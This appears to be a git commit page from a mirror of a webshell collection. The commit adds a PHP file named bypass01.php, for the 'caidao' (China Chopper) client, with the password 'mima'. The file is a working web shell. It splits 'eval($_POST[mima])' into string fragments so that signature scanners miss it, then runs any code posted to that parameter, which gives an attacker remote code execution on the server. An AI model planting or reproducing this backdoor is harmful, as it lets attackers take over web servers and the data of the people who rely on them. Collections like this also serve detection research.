mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
Create bypass01.php
password : mima
This commit is contained in:
parent
4381ded7c0
commit
db0431a444
1 changed files with 13 additions and 0 deletions
13
caidao-shell/bypass01.php
Normal file
13
caidao-shell/bypass01.php
Normal file
|
@ -0,0 +1,13 @@
|
||||||
|
<?php
|
||||||
|
$s0="e";
|
||||||
|
$s1="val($";
|
||||||
|
$s2="_";
|
||||||
|
$s3="P";
|
||||||
|
$s4="O";
|
||||||
|
$s5="ST";
|
||||||
|
|
||||||
|
|
||||||
|
$poos=$s0.$s1.$s2.$s3.$s4.$s5."[mima]);";
|
||||||
|
$pp=@eval($poos);
|
||||||
|
@eval($pp);
|
||||||
|
?>
|
Loading…
Reference in a new issue